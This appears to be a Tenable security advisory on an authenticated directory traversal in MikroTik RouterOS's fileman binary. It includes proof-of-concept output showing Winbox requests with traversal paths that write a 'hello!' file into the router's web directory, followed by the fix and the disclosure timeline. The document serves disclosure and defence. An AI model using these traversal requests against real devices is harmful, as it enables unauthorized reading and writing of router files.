MikroTik RouterOS Authenticated Directory Traversal

Tenable discovered a vulnerability while analyzing MikroTik's RouterOS 6.42.12 (a long-term release). The vulnerability is an authenticated, remote directory traversal that gives an authenticated attacker mkdir, read, and write access to files outside of the sandbox path, /rw/disk. An attacker has read access to the entire filesystem and write access to all locations that aren't marked as read-only. This vulnerability is very similar to CVE-2018-14847. The major difference is that this new vulnerability exists in the fileman binary (SYS_TO number: 72) and it requires authentication to invoke it. Otherwise, the traversal logic is the same and it can be reached over HTTP or Winbox (8291). The following output is from a [proof of concept](https://github.com/tenable/routeros/tree/master/poc/cve_2019_3943) that creates a webpage that simply says "hello!" ``` albinolobster@ubuntu:~/routeros/poc/cve_2019_3943/build$ curl http://192.168.1.15/webfig/lol.txt <html> <head><title>Error 404: Not Found</title></head> <body> <h1>Error 404: Not Found</h1> </body> </html> albinolobster@ubuntu:~/routeros/poc/cve_2019_3943/build$ ./cve_2019_3943_poc -i 192.168.1.15 -p 8291 req: {bff0005:1,uff0006:1,uff0007:6,s1:'//./.././.././../pckg/lol',Uff0001:[72,1]} resp: {uff0003:2,uff0006:1,Uff0001:[],Uff0002:[72,1]} req: {bff0005:1,uff0006:2,uff0007:6,s1:'//./.././.././../pckg/lol/home',Uff0001:[72,1]} resp: {uff0003:2,uff0006:2,Uff0001:[],Uff0002:[72,1]} req: {bff0005:1,uff0006:3,uff0007:6,s1:'//./.././.././../pckg/lol/home/web/',Uff0001:[72,1]} resp: {uff0003:2,uff0006:3,Uff0001:[],Uff0002:[72,1]} req: {bff0005:1,uff0006:4,uff0007:6,s1:'//./.././.././../pckg/lol/home/web/webfig',Uff0001:[72,1]} resp: {uff0003:2,uff0006:4,Uff0001:[],Uff0002:[72,1]} req: {bff0005:1,uff0006:5,uff0007:1,s1:'//./.././.././../pckg/lol/home/web/webfig/lol.txt',Uff0001:[72,1]} resp: {ufe0001:1,uff0003:2,uff0006:5,Uff0001:[],Uff0002:[72,1]} req: {bff0005:1,ufe0001:1,uff0006:6,uff0007:2,r5:[104,101,108,108,111,33,10],Uff0001:[72,1]} resp: {uff0003:2,uff0006:6,Uff0001:[],Uff0002:[72,1]} albinolobster@ubuntu:~/routeros/poc/cve_2019_3943/build$ curl http://192.168.1.15/webfig/lol.txt hello! albinolobster@ubuntu:~/routeros/poc/cve_2019_3943/build$ ``` ### Solution Upgrade to RouterOS 6.44RC1 or newer for all releases (long-term, stable, and test) ### Additional References https://github.com/tenable/routeros/tree/master/poc/cve_2019_3943 ### Disclosure Timeline * 02/11/2019 - Initial discovery. * 02/12/2019 - Reported to MikroTik. 90 days is May 14. * 02/13/2019 - MikroTik states, "we are looking into it, and will let you know as soon as we have reproduced it and provided a fix. " * 04/03/2019 - Tenable asks if MikroTik was able to reproduce. * 04/08/2019 - MikroTik states, "The problem was resolved February 13, the fixed version 6.44 was released to web on February 15 as RC1 and later made it into 6.44 stable release too." * 04/08/2019 - Tenable thanks MikroTik. * 04/08/2019 - Tenable verifies the fix did in fact go out in February. Tenable notes, no information about the patch appears in the RouterOS release notes. Tenable was also not notified. * 04/08/2019 - It has been pointed out there is a changelog entry. It reads: "webfig: improved file handling;"